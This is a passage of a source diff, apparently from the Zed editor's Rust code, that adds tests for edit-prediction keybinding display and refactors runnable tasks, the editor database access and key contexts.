+ assert_eq!(edits.len(), 1);
+ assert_eq!(edits[0].1.as_ref(), "42");
+ });
+
+ cx.simulate_keystroke("tab");
+ cx.run_until_parked();
+
+ cx.assert_editor_state("let x = 42ˇ;");
+}
+
+#[gpui::test]
+async fn test_cursor_popover_edit_prediction_keybind_cases(cx: &mut gpui::TestAppContext) {
+ enum CursorPopoverPredictionKind {
+ SingleLine,
+ MultiLine,
+ SingleLineWithPreview,
+ MultiLineWithPreview,
+ DeleteSingleNewline,
+ StaleSingleLineAfterMultiLine,
+ }
+
+ struct CursorPopoverCase {
+ name: &'static str,
+ prediction_kind: CursorPopoverPredictionKind,
+ expected_action: EditPredictionKeybindAction,
+ }
+
+ let cases = [
+ CursorPopoverCase {
+ name: "single line prediction uses accept action",
+ prediction_kind: CursorPopoverPredictionKind::SingleLine,
+ expected_action: EditPredictionKeybindAction::Accept,
+ },
+ CursorPopoverCase {
+ name: "multi line prediction uses preview action",
+ prediction_kind: CursorPopoverPredictionKind::MultiLine,
+ expected_action: EditPredictionKeybindAction::Preview,
+ },
+ CursorPopoverCase {
+ name: "single line prediction with preview still uses accept action",
+ prediction_kind: CursorPopoverPredictionKind::SingleLineWithPreview,
+ expected_action: EditPredictionKeybindAction::Accept,
+ },
+ CursorPopoverCase {
+ name: "multi line prediction with preview uses preview action",
+ prediction_kind: CursorPopoverPredictionKind::MultiLineWithPreview,
+ expected_action: EditPredictionKeybindAction::Preview,
+ },
+ CursorPopoverCase {
+ name: "single line newline deletion uses accept action",
+ prediction_kind: CursorPopoverPredictionKind::DeleteSingleNewline,
+ expected_action: EditPredictionKeybindAction::Accept,
+ },
+ CursorPopoverCase {
+ name: "stale multi line prediction does not force preview action",
+ prediction_kind: CursorPopoverPredictionKind::StaleSingleLineAfterMultiLine,
+ expected_action: EditPredictionKeybindAction::Accept,
+ },
+ ];
+
+ for case in cases {
+ init_test(cx, |_| {});
+ load_default_keymap(cx);
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+
+ match case.prediction_kind {
+ CursorPopoverPredictionKind::SingleLine => {
+ cx.set_state("let x = ˇ;");
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::MultiLine => {
+ cx.set_state("let x = ˇ;");
+ propose_edits(&provider, vec![(8..8, "42\n43")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::SingleLineWithPreview => {
+ cx.set_state("let x = ˇ;");
+ propose_edits_with_preview(&provider, vec![(8..8, "42")], &mut cx).await;
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::MultiLineWithPreview => {
+ cx.set_state("let x = ˇ;");
+ propose_edits_with_preview(&provider, vec![(8..8, "42\n43")], &mut cx).await;
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::DeleteSingleNewline => {
+ cx.set_state(indoc! {"
+ fn main() {
+ let value = 1;
+ ˇprintln!(\"done\");
+ }
+ "});
+ propose_edits(
+ &provider,
+ vec![(Point::new(1, 18)..Point::new(2, 17), "")],
+ &mut cx,
+ );
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::StaleSingleLineAfterMultiLine => {
+ cx.set_state("let x = ˇ;");
+ propose_edits(&provider, vec![(8..8, "42\n43")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ cx.update_editor(|editor, _window, cx| {
+ assert!(editor.active_edit_prediction.is_some());
+ assert!(editor.stale_edit_prediction_in_menu.is_none());
+ editor.take_active_edit_prediction(cx);
+ assert!(editor.active_edit_prediction.is_none());
+ assert!(editor.stale_edit_prediction_in_menu.is_some());
+ });
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ }
+
+ cx.update_editor(|editor, window, cx| {
+ assert!(
+ editor.has_active_edit_prediction(),
+ "case '{}' should have an active edit prediction",
+ case.name
+ );
+
+ let keybind_display = editor.edit_prediction_keybind_display(
+ EditPredictionKeybindSurface::CursorPopoverExpanded,
+ window,
+ cx,
+ );
+ let accept_keystroke = keybind_display
+ .accept_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have an accept binding", case.name));
+ let preview_keystroke = keybind_display
+ .preview_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have a preview binding", case.name));
+
+ assert_eq!(
+ keybind_display.action, case.expected_action,
+ "case '{}' selected the wrong cursor popover action",
+ case.name
+ );
+ assert_eq!(
+ accept_keystroke.key(),
+ "tab",
+ "case '{}' selected the wrong accept binding",
+ case.name
+ );
+ assert!(
+ preview_keystroke.modifiers().modified(),
+ "case '{}' should use a modified preview binding",
+ case.name
+ );
+
+ if matches!(
+ case.prediction_kind,
+ CursorPopoverPredictionKind::StaleSingleLineAfterMultiLine
+ ) {
+ assert!(
+ editor.stale_edit_prediction_in_menu.is_none(),
+ "case '{}' should clear stale menu state",
+ case.name
+ );
+ }
+ });
+ }
+}
+
fn assert_editor_active_edit_completion(
cx: &mut EditorTestContext,
assert: impl FnOnce(MultiBufferSnapshot, &Vec<(Range<Anchor>, Arc<str>)>),
@@ -466,6 +1068,44 @@ fn propose_edits<T: ToOffset>(
propose_edits_with_cursor_position(provider, edits, None, cx);
}
+async fn propose_edits_with_preview<T: ToOffset + Clone>(
+ provider: &Entity<FakeEditPredictionDelegate>,
+ edits: Vec<(Range<T>, &str)>,
+ cx: &mut EditorTestContext,
+) {
+ let snapshot = cx.buffer_snapshot();
+ let edits = edits
+ .into_iter()
+ .map(|(range, text)| {
+ let anchor_range =
+ snapshot.anchor_after(range.start.clone())..snapshot.anchor_before(range.end);
+ (anchor_range, Arc::<str>::from(text))
+ })
+ .collect::<Vec<_>>();
+
+ let preview_edits = edits
+ .iter()
+ .map(|(range, text)| (range.clone(), text.clone()))
+ .collect::<Arc<[_]>>();
+
+ let edit_preview = cx
+ .buffer(|buffer: &Buffer, app| buffer.preview_edits(preview_edits, app))
+ .await;
+
+ let provider_edits = edits.into_iter().collect();
+
+ cx.update(|_, cx| {
+ provider.update(cx, |provider, _| {
+ provider.set_edit_prediction(Some(edit_prediction_types::EditPrediction::Local {
+ id: None,
+ edits: provider_edits,
+ cursor_position: None,
+ edit_preview: Some(edit_preview),
+ }))
+ })
+ });
+}
+
fn propose_edits_with_cursor_position<T: ToOffset>(
provider: &Entity<FakeEditPredictionDelegate>,
edits: Vec<(Range<T>, &str)>,
@@ -532,6 +1172,12 @@ fn assign_editor_completion_provider(
})
}
+fn assign_editor_completion_menu_provider(cx: &mut EditorTestContext) {
+ cx.update_editor(|editor, _, _| {
+ editor.set_completion_provider(Some(Rc::new(FakeCompletionMenuProvider)));
+ });
+}
+
fn propose_edits_non_zed<T: ToOffset>(
provider: &Entity<FakeNonZedEditPredictionDelegate>,
edits: Vec<(Range<T>, &str)>,
@@ -564,9 +1210,58 @@ fn assign_editor_completion_provider_non_zed(
})
}
+struct FakeCompletionMenuProvider;
+
+impl CompletionProvider for FakeCompletionMenuProvider {
+ fn completions(
+ &self,
+ _excerpt_id: ExcerptId,
+ _buffer: &Entity<Buffer>,
+ _buffer_position: text::Anchor,
+ _trigger: CompletionContext,
+ _window: &mut Window,
+ _cx: &mut Context<crate::Editor>,
+ ) -> Task<anyhow::Result<Vec<CompletionResponse>>> {
+ let completion = Completion {
+ replace_range: text::Anchor::MIN..text::Anchor::MAX,
+ new_text: "fake_completion".to_string(),
+ label: CodeLabel::plain("fake_completion".to_string(), None),
+ documentation: None,
+ source: CompletionSource::Custom,
+ icon_path: None,
+ match_start: None,
+ snippet_deduplication_key: None,
+ insert_text_mode: None,
+ confirm: None,
+ };
+
+ Task::ready(Ok(vec![CompletionResponse {
+ completions: vec![completion],
+ display_options: Default::default(),
+ is_incomplete: false,
+ }]))
+ }
+
+ fn is_completion_trigger(
+ &self,
+ _buffer: &Entity<Buffer>,
+ _position: language::Anchor,
+ _text: &str,
+ _trigger_in_words: bool,
+ _cx: &mut Context<crate::Editor>,
+ ) -> bool {
+ false
+ }
+
+ fn filter_completions(&self) -> bool {
+ false
+ }
+}
+
#[derive(Default, Clone)]
pub struct FakeEditPredictionDelegate {
pub completion: Option<edit_prediction_types::EditPrediction>,
+ pub refresh_count: Arc<AtomicUsize>,
}
impl FakeEditPredictionDelegate {
@@ -619,6 +1314,7 @@ impl EditPredictionDelegate for FakeEditPredictionDelegate {
_debounce: bool,
_cx: &mut gpui::Context<Self>,
) {
+ self.refresh_count.fetch_add(1, atomic::Ordering::SeqCst);
}
fn accept(&mut self, _cx: &mut gpui::Context<Self>) {}
@@ -35,13 +35,13 @@ mod lsp_ext;
mod mouse_context_menu;
pub mod movement;
mod persistence;
+mod runnables;
mod rust_analyzer_ext;
pub mod scroll;
mod selections_collection;
pub mod semantic_tokens;
mod split;
pub mod split_editor_view;
-pub mod tasks;
#[cfg(test)]
mod code_completion_tests;
@@ -105,7 +105,7 @@ use edit_prediction_types::{
EditPredictionGranularity, SuggestionDisplayType,
};
use editor_settings::{GoToDefinitionFallback, Minimap as MinimapSettings};
-use element::{AcceptEditPredictionBinding, LineWithInvisibles, PositionMap, layout_line};
+use element::{LineWithInvisibles, PositionMap, layout_line};
use futures::{
FutureExt,
future::{self, Shared, join},
@@ -133,8 +133,8 @@ use language::{
BufferSnapshot, Capability, CharClassifier, CharKind, CharScopeContext, CodeLabel, CursorShape,
DiagnosticEntryRef, DiffOptions, EditPredictionsMode, EditPreview, HighlightedText, IndentKind,
IndentSize, Language, LanguageName, LanguageRegistry, LanguageScope, LocalFile, OffsetRangeExt,
- OutlineItem, Point, Runnable, Selection, SelectionGoal, TextObject, TransactionId,
- TreeSitterOptions, WordsQuery,
+ OutlineItem, Point, Selection, SelectionGoal, TextObject, TransactionId, TreeSitterOptions,
+ WordsQuery,
language_settings::{
self, LanguageSettings, LspInsertMode, RewrapBehavior, WordsCompletionMode,
all_language_settings, language_settings,
@@ -153,12 +153,12 @@ use multi_buffer::{
ExcerptInfo, ExpandExcerptDirection, MultiBufferDiffHunk, MultiBufferPoint, MultiBufferRow,
};
use parking_lot::Mutex;
-use persistence::DB;
+use persistence::EditorDb;
use project::{
BreakpointWithPosition, CodeAction, Completion, CompletionDisplayOptions, CompletionIntent,
CompletionResponse, CompletionSource, DisableAiSettings, DocumentHighlight, InlayHint, InlayId,
InvalidationStrategy, Location, LocationLink, LspAction, PrepareRenameResponse, Project,
- ProjectItem, ProjectPath, ProjectTransaction, TaskSourceKind,
+ ProjectItem, ProjectPath, ProjectTransaction,
debugger::{
breakpoint_store::{
Breakpoint, BreakpointEditAction, BreakpointSessionState, BreakpointState,
@@ -200,7 +200,7 @@ use std::{
sync::Arc,
time::{Duration, Instant},
};
-use task::{ResolvedTask, RunnableTag, TaskTemplate, TaskVariables};
+use task::TaskVariables;
use text::{BufferId, FromAnchor, OffsetUtf16, Rope, ToOffset as _, ToPoint as _};
use theme::{
AccentColors, ActiveTheme, GlobalTheme, PlayerColor, StatusColors, SyntaxTheme, Theme,
@@ -209,6 +209,7 @@ use theme::{
use ui::{
Avatar, ButtonSize, ButtonStyle, ContextMenu, Disclosure, IconButton, IconButtonShape,
IconName, IconSize, Indicator, Key, Tooltip, h_flex, prelude::*, scrollbars::ScrollbarAutoHide,
+ utils::WithRemSize,
};
use ui_input::ErasedEditor;
use util::{RangeExt, ResultExt, TryFutureExt, maybe, post_inc};
@@ -216,10 +217,11 @@ use workspace::{
CollaboratorId, Item as WorkspaceItem, ItemId, ItemNavHistory, NavigationEntry, OpenInTerminal,
OpenTerminal, Pane, RestoreOnStartupBehavior, SERIALIZATION_THROTTLE_TIME, SplitDirection,
TabBarSettings, Toast, ViewId, Workspace, WorkspaceId, WorkspaceSettings,
- item::{BreadcrumbText, ItemBufferKind, ItemHandle, PreviewTabsSettings, SaveOptions},
+ item::{ItemBufferKind, ItemHandle, PreviewTabsSettings, SaveOptions},
notifications::{DetachAndPromptErr, NotificationId, NotifyTaskExt},
searchable::SearchEvent,
};
+pub use zed_actions::editor::RevealInFileManager;
use zed_actions::editor::{MoveDown, MoveUp};
use crate::{
@@ -230,6 +232,7 @@ use crate::{
InlineValueCache,
inlay_hints::{LspInlayHintData, inlay_hint_settings},
},
+ runnables::{ResolvedTasks, RunnableData, RunnableTasks},
scroll::{ScrollOffset, ScrollPixelOffset},
selections_collection::resolve_selections_wrapping_blocks,
semantic_tokens::SemanticTokenState,
@@ -254,7 +257,6 @@ pub(crate) const SCROLL_CENTER_TOP_BOTTOM_DEBOUNCE_TIMEOUT: Duration = Duration:
pub const LSP_REQUEST_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(50);
pub(crate) const EDIT_PREDICTION_KEY_CONTEXT: &str = "edit_prediction";
-pub(crate) const EDIT_PREDICTION_CONFLICT_KEY_CONTEXT: &str = "edit_prediction_conflict";
pub(crate) const MINIMAP_FONT_SIZE: AbsoluteLength = AbsoluteLength::Pixels(px(2.));
pub type RenderDiffHunkControlsFn = Arc<
@@ -699,6 +701,30 @@ pub enum EditPredictionPreview {
},
}
+#[derive(Copy, Clone, Eq, PartialEq)]
+enum EditPredictionKeybindSurface {
+ Inline,
+ CursorPopoverCompact,
+ CursorPopoverExpanded,
+}
+
+#[derive(Copy, Clone, Eq, PartialEq, Debug)]
+enum EditPredictionKeybindAction {
+ Accept,
+ Preview,
+}
+
+struct EditPredictionKeybindDisplay {
+ #[cfg(test)]
+ accept_keystroke: Option<gpui::KeybindingKeystroke>,
+ #[cfg(test)]
+ preview_keystroke: Option<gpui::KeybindingKeystroke>,
+ displayed_keystroke: Option<gpui::KeybindingKeystroke>,
+ action: EditPredictionKeybindAction,
+ missing_accept_keystroke: bool,
+ show_hold_label: bool,
+}
+
impl EditPredictionPreview {
pub fn released_too_fast(&self) -> bool {
match self {
@@ -856,37 +882,6 @@ impl BufferSerialization {
}
}
-#[derive(Clone, Debug)]
-struct RunnableTasks {
- templates: Vec<(TaskSourceKind, TaskTemplate)>,
- offset: multi_buffer::Anchor,
- // We need the column at which the task context evaluation should take place (when we're spawning it via gutter).
- column: u32,
- // Values of all named captures, including those starting with '_'
- extra_variables: HashMap<String, String>,
- // Full range of the tagged region. We use it to determine which `extra_variables` to grab for context resolution in e.g. a modal.
- context_range: Range<BufferOffset>,
-}
-
-impl RunnableTasks {
- fn resolve<'a>(
- &'a self,
- cx: &'a task::TaskContext,
- ) -> impl Iterator<Item = (TaskSourceKind, ResolvedTask)> + 'a {
- self.templates.iter().filter_map(|(kind, template)| {
- template
- .resolve_task(&kind.to_id_base(), cx)
- .map(|task| (kind.clone(), task))
- })
- }
-}
-
-#[derive(Clone)]
-pub struct ResolvedTasks {
- templates: SmallVec<[(TaskSourceKind, ResolvedTask); 1]>,
- position: Anchor,
-}
-
/// Addons allow storing per-editor state in other crates (e.g. Vim)
pub trait Addon: 'static {
fn extend_key_context(&self, _: &mut KeyContext, _: &App) {}
@@ -1254,8 +1249,7 @@ pub struct Editor {
show_completions_on_input_override: Option<bool>,
menu_edit_predictions_policy: MenuEditPredictionsPolicy,
edit_prediction_preview: EditPredictionPreview,
- edit_prediction_indent_conflict: bool,
- edit_prediction_requires_modifier_in_indent_conflict: bool,
+ in_leading_whitespace: bool,
next_inlay_id: usize,
next_color_inlay_id: usize,
_subscriptions: Vec<Subscription>,
@@ -1294,8 +1288,7 @@ pub struct Editor {
last_bounds: Option<Bounds<Pixels>>,
last_position_map: Option<Rc<PositionMap>>,
expect_bounds_change: Option<Bounds<Pixels>>,
- tasks: BTreeMap<(BufferId, BufferRow), RunnableTasks>,
- tasks_update_task: Option<Task<()>>,
+ runnables: RunnableData,
breakpoint_store: Option<Entity<BreakpointStore>>,
gutter_breakpoint_indicator: (Option<PhantomBreakpointIndicator>, Option<Task<()>>),
pub(crate) gutter_diff_review_indicator: (Option<PhantomDiffReviewIndicator>, Option<Task<()>>),
@@ -1876,6 +1869,7 @@ pub enum MultibufferSelectionMode {
pub struct RewrapOptions {
pub override_language_settings: bool,
pub preserve_existing_whitespace: bool,
+ pub line_length: Option<usize>,
}
impl Editor {
@@ -2172,16 +2166,9 @@ impl Editor {
editor.registered_buffers.clear();
editor.register_visible_buffers(cx);
editor.invalidate_semantic_tokens(None);
+ editor.refresh_runnables(None, window, cx);
editor.update_lsp_data(None, window, cx);
editor.refresh_inlay_hints(InlayHintRefreshReason::ServerRemoved, cx);
- if editor.tasks_update_task.is_none() {
- editor.tasks_update_task = Some(editor.refresh_runnables(window, cx));
- }
- }
- project::Event::LanguageServerAdded(..) => {
- if editor.tasks_update_task.is_none() {
- editor.tasks_update_task = Some(editor.refresh_runnables(window, cx));
- }
}
project::Event::SnippetEdit(id, snippet_edits) => {
// todo(lw): Non singletons
@@ -2209,6 +2196,7 @@ impl Editor {
let buffer_id = *buffer_id;
if editor.buffer().read(cx).buffer(buffer_id).is_some() {
editor.register_buffer(buffer_id, cx);
+ editor.refresh_runnables(Some(buffer_id), window, cx);
editor.update_lsp_data(Some(buffer_id), window, cx);
editor.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx);
refresh_linked_ranges(editor, window, cx);
@@ -2287,7 +2275,7 @@ impl Editor {
&task_inventory,
window,
|editor, _, window, cx| {
- editor.tasks_update_task = Some(editor.refresh_runnables(window, cx));
+ editor.refresh_runnables(None, window, cx);
},
));
};
@@ -2509,8 +2497,7 @@ impl Editor {
show_completions_on_input_override: None,
menu_edit_predictions_policy: MenuEditPredictionsPolicy::ByProvider,
edit_prediction_settings: EditPredictionSettings::Disabled,
- edit_prediction_indent_conflict: false,
- edit_prediction_requires_modifier_in_indent_conflict: true,
+ in_leading_whitespace: false,
custom_context_menu: None,
show_git_blame_gutter: false,
show_git_blame_inline: false,
@@ -2528,7 +2515,6 @@ impl Editor {
}),
blame: None,
blame_subscription: None,
- tasks: BTreeMap::default(),
breakpoint_store,
gutter_breakpoint_indicator: (None, None),
@@ -2564,7 +2550,7 @@ impl Editor {
]
})
.unwrap_or_default(),
- tasks_update_task: None,
+ runnables: RunnableData::new(),
pull_diagnostics_task: Task::ready(()),
colors: None,
refresh_colors_task: Task::ready(()),
@@ -2631,7 +2617,6 @@ impl Editor {
cx.notify();
}));
}
- editor.tasks_update_task = Some(editor.refresh_runnables(window, cx));
editor._subscriptions.extend(project_subscriptions);
editor._subscriptions.push(cx.subscribe_in(
@@ -2659,15 +2644,7 @@ impl Editor {
.await;
editor
.update_in(cx, |editor, window, cx| {
- editor.register_visible_buffers(cx);
- editor.colorize_brackets(false, cx);
- editor.refresh_inlay_hints(
- InlayHintRefreshReason::NewLinesShown,
- cx,
- );
- if !editor.buffer().read(cx).is_singleton() {
- editor.update_lsp_data(None, window, cx);
- }
+ editor.update_data_on_scroll(window, cx)
})
.ok();
});
@@ -2902,12 +2879,17 @@ impl Editor {
}
if has_active_edit_prediction {
- if self.edit_prediction_in_conflict() {
- key_context.add(EDIT_PREDICTION_CONFLICT_KEY_CONTEXT);
- } else {
- key_context.add(EDIT_PREDICTION_KEY_CONTEXT);
- key_context.add("copilot_suggestion");
- }
+ key_context.add(EDIT_PREDICTION_KEY_CONTEXT);
+ key_context.add("copilot_suggestion");
+ }
+
+ if self.in_leading_whitespace {
+ key_context.add("in_leading_whitespace");
+ }
+ if self.edit_prediction_requires_modifier() {
+ key_context.set("edit_prediction_mode", "subtle")
+ } else {
+ key_context.set("edit_prediction_mode", "eager");
}
if self.selection_mark_mode {
@@ -2915,14 +2897,23 @@ impl Editor {
}
let disjoint = self.selections.disjoint_anchors();
- let snapshot = self.snapshot(window, cx);
- let snapshot = snapshot.buffer_snapshot();
- if self.mode == EditorMode::SingleLine
- && let [selection] = disjoint
+ if matches!(
+ &self.mode,
+ EditorMode::SingleLine | EditorMode::AutoHeight { .. }
+ ) && let [selection] = disjoint
&& selection.start == selection.end
- && selection.end.to_offset(snapshot) == snapshot.len()
{
- key_context.add("end_of_input");
+ let snapshot = self.snapshot(window, cx);
+ let snapshot = snapshot.buffer_snapshot();
+ let caret_offset = selection.end.to_offset(snapshot);
+
+ if caret_offset == MultiBufferOffset(0) {
+ key_context.add("start_of_input");
+ }
+
+ if caret_offset == snapshot.len() {
+ key_context.add("end_of_input");
+ }
}
if self.has_any_expanded_diff_hunks(cx) {
@@ -2961,32 +2952,13 @@ impl Editor {
}
}
- pub fn edit_prediction_in_conflict(&self) -> bool {
- if !self.show_edit_predictions_in_menu() {
- return false;
- }
-
- let showing_completions = self
- .context_menu
- .borrow()
- .as_ref()
- .is_some_and(|context| matches!(context, CodeContextMenu::Completions(_)));
-
- showing_completions
- || self.edit_prediction_requires_modifier()
- // Require modifier key when the cursor is on leading whitespace, to allow `tab`
- // bindings to insert tab characters.
- || (self.edit_prediction_requires_modifier_in_indent_conflict && self.edit_prediction_indent_conflict)
- }
-
- pub fn accept_edit_prediction_keybind(
+ fn accept_edit_prediction_keystroke(
&self,
granularity: EditPredictionGranularity,
window: &mut Window,
cx: &mut App,
- ) -> AcceptEditPredictionBinding {
+ ) -> Option<gpui::KeybindingKeystroke> {
let key_context = self.key_context_internal(true, window, cx);
- let in_conflict = self.edit_prediction_in_conflict();
let bindings =
match granularity {
@@ -2999,13 +2971,157 @@ impl Editor {
}
};
- AcceptEditPredictionBinding(bindings.into_iter().rev().find(|binding| {
- !in_conflict
- || binding
- .keystrokes()
- .first()
- .is_some_and(|keystroke| keystroke.modifiers().modified())
- }))
+ bindings
+ .into_iter()
+ .rev()
+ .find_map(|binding| match binding.keystrokes() {
+ [keystroke, ..] => Some(keystroke.clone()),
+ _ => None,
+ })
+ }
+
+ fn preview_edit_prediction_keystroke(
+ &self,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> Option<gpui::KeybindingKeystroke> {
+ let key_context = self.key_context_internal(true, window, cx);
+ let bindings = window.bindings_for_action_in_context(&AcceptEditPrediction, key_context);
+ bindings
+ .into_iter()
+ .rev()
+ .find_map(|binding| match binding.keystrokes() {
+ [keystroke, ..] if keystroke.modifiers().modified() => Some(keystroke.clone()),
+ _ => None,
+ })
+ }
+
+ fn edit_prediction_preview_modifiers_held(
+ &self,
+ modifiers: &Modifiers,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> bool {
+ let key_context = self.key_context_internal(true, window, cx);
+ let actions: [&dyn Action; 3] = [
+ &AcceptEditPrediction,
+ &AcceptNextWordEditPrediction,
+ &AcceptNextLineEditPrediction,
+ ];
+
+ actions.into_iter().any(|action| {
+ window
+ .bindings_for_action_in_context(action, key_context.clone())
+ .into_iter()
+ .rev()
+ .any(|binding| {
+ binding.keystrokes().first().is_some_and(|keystroke| {
+ keystroke.modifiers().modified() && keystroke.modifiers() == modifiers
+ })
+ })
+ })
+ }
+
+ fn edit_prediction_cursor_popover_prefers_preview(
+ &self,
+ completion: &EditPredictionState,
+ ) -> bool {
+ match &completion.completion {
+ EditPrediction::Edit {
+ edits, snapshot, ..
+ } => {
+ let mut start_row: Option<u32> = None;
+ let mut end_row: Option<u32> = None;
+
+ for (range, text) in edits {
+ let edit_start_row = range.start.text_anchor.to_point(snapshot).row;
+ let old_end_row = range.end.text_anchor.to_point(snapshot).row;
+ let inserted_newline_count = text
+ .as_ref()
+ .chars()
+ .filter(|character| *character == '\n')
+ .count() as u32;
+ let deleted_newline_count = old_end_row - edit_start_row;
+ let preview_end_row = edit_start_row + inserted_newline_count;
+
+ start_row =
+ Some(start_row.map_or(edit_start_row, |row| row.min(edit_start_row)));
+ end_row = Some(end_row.map_or(preview_end_row, |row| row.max(preview_end_row)));
+
+ if deleted_newline_count > 1 {
+ end_row = Some(end_row.map_or(old_end_row, |row| row.max(old_end_row)));
+ }
+ }
+
+ start_row
+ .zip(end_row)
+ .is_some_and(|(start_row, end_row)| end_row > start_row)
+ }
+ EditPrediction::MoveWithin { .. } | EditPrediction::MoveOutside { .. } => false,
+ }
+ }
+
+ fn edit_prediction_keybind_display(
+ &self,
+ surface: EditPredictionKeybindSurface,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> EditPredictionKeybindDisplay {
+ let accept_keystroke =
+ self.accept_edit_prediction_keystroke(EditPredictionGranularity::Full, window, cx);
+ let preview_keystroke = self.preview_edit_prediction_keystroke(window, cx);
+
+ let action = match surface {
+ EditPredictionKeybindSurface::Inline
+ | EditPredictionKeybindSurface::CursorPopoverCompact => {
+ if self.edit_prediction_requires_modifier() {
+ EditPredictionKeybindAction::Preview
+ } else {
+ EditPredictionKeybindAction::Accept
+ }
+ }
+ EditPredictionKeybindSurface::CursorPopoverExpanded => self
+ .active_edit_prediction
+ .as_ref()
+ .filter(|completion| {
+ self.edit_prediction_cursor_popover_prefers_preview(completion)
+ })
+ .map_or(EditPredictionKeybindAction::Accept, |_| {
+ EditPredictionKeybindAction::Preview
+ }),
+ };
+ #[cfg(test)]
+ let preview_copy = preview_keystroke.clone();
+ #[cfg(test)]
+ let accept_copy = accept_keystroke.clone();
+
+ let displayed_keystroke = match surface {
+ EditPredictionKeybindSurface::Inline => match action {
+ EditPredictionKeybindAction::Accept => accept_keystroke,
+ EditPredictionKeybindAction::Preview => preview_keystroke,
+ },
+ EditPredictionKeybindSurface::CursorPopoverCompact
+ | EditPredictionKeybindSurface::CursorPopoverExpanded => match action {
+ EditPredictionKeybindAction::Accept => accept_keystroke,
+ EditPredictionKeybindAction::Preview => {
+ preview_keystroke.or_else(|| accept_keystroke.clone())
+ }
+ },
+ };
+
+ let missing_accept_keystroke = displayed_keystroke.is_none();
+
+ EditPredictionKeybindDisplay {
+ #[cfg(test)]
+ accept_keystroke: accept_copy,
+ #[cfg(test)]
+ preview_keystroke: preview_copy,
+ displayed_keystroke,
+ action,
+ missing_accept_keystroke,
+ show_hold_label: matches!(surface, EditPredictionKeybindSurface::CursorPopoverCompact)
+ && self.edit_prediction_preview.released_too_fast(),
+ }
}
pub fn new_file(
@@ -3642,7 +3758,6 @@ impl Editor {
self.refresh_matching_bracket_highlights(&display_map, cx);
self.refresh_outline_symbols_at_cursor(cx);
self.update_visible_edit_prediction(window, cx);
- self.edit_prediction_requires_modifier_in_indent_conflict = true;
self.inline_blame_popover.take();
if self.git_blame_inline_enabled {
self.start_inline_blame_timer(window, cx);
@@ -3684,6 +3799,7 @@ impl Editor {
let selections = selections.clone();
let background_executor = cx.background_executor().clone();
let editor_id = cx.entity().entity_id().as_u64() as ItemId;
+ let db = EditorDb::global(cx);
self.serialize_selections = cx.background_spawn(async move {
background_executor.timer(SERIALIZATION_THROTTLE_TIME).await;
let db_selections = selections
@@ -3696,7 +3812,7 @@ impl Editor {
})
.collect();
- DB.save_editor_selections(editor_id, workspace_id, db_selections)
+ db.save_editor_selections(editor_id, workspace_id, db_selections)
.await
.with_context(|| {
format!(
@@ -3781,16 +3897,17 @@ impl Editor {
(start, end, start_fp, end_fp)
})
.collect::<Vec<_>>();
+ let db = EditorDb::global(cx);
self.serialize_folds = cx.background_spawn(async move {
background_executor.timer(SERIALIZATION_THROTTLE_TIME).await;
if db_folds.is_empty() {
// No folds - delete any persisted folds for this file
- DB.delete_file_folds(workspace_id, file_path)
+ db.delete_file_folds(workspace_id, file_path)
.await
.with_context(|| format!("deleting file folds for workspace {workspace_id:?}"))
.log_err();
} else {
- DB.save_file_folds(workspace_id, file_path, db_folds)
+ db.save_file_folds(workspace_id, file_path, db_folds)
.await
.with_context(|| {
format!("persisting file folds for workspace {workspace_id:?}")
@@ -5034,6 +5151,7 @@ impl Editor {
RewrapOptions {
override_language_settings: true,
preserve_existing_whitespace: true,
+ line_length: None,
},
cx,
)
@@ -5790,18 +5908,11 @@ impl Editor {
let display_snapshot = self.display_map.update(cx, |map, cx| map.snapshot(cx));
let multi_buffer = self.buffer().read(cx);
let multi_buffer_snapshot = multi_buffer.snapshot(cx);
- let multi_buffer_visible_start = self
- .scroll_manager
- .native_anchor(&display_snapshot, cx)
- .anchor
- .to_point(&multi_buffer_snapshot);
- let multi_buffer_visible_end = multi_buffer_snapshot.clip_point(
- multi_buffer_visible_start
- + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0),
- Bias::Left,
- );
multi_buffer_snapshot
- .range_to_buffer_ranges(multi_buffer_visible_start..=multi_buffer_visible_end)
+ .range_to_buffer_ranges(
+ self.multi_buffer_visible_range(&display_snapshot, cx)
+ .to_inclusive(),
+ )
.into_iter()
.filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty())
.filter_map(|(buffer, excerpt_visible_range, excerpt_id)| {
@@ -6534,6 +6645,7 @@ impl Editor {
.selections
.all::<MultiBufferOffset>(&self.display_snapshot(cx));
let mut ranges = Vec::new();
+ let mut all_commit_ranges = Vec::new();
let mut linked_edits = LinkedEdits::new();
let text: Arc<str> = new_text.clone().into();
@@ -6559,10 +6671,12 @@ impl Editor {
ranges.push(range.clone());
+ let start_anchor = snapshot.anchor_before(range.start);
+ let end_anchor = snapshot.anchor_after(range.end);
+ let anchor_range = start_anchor.text_anchor..end_anchor.text_anchor;
+ all_commit_ranges.push(anchor_range.clone());
+
if !self.linked_edit_ranges.is_empty() {
- let start_anchor = snapshot.anchor_before(range.start);
- let end_anchor = snapshot.anchor_after(range.end);
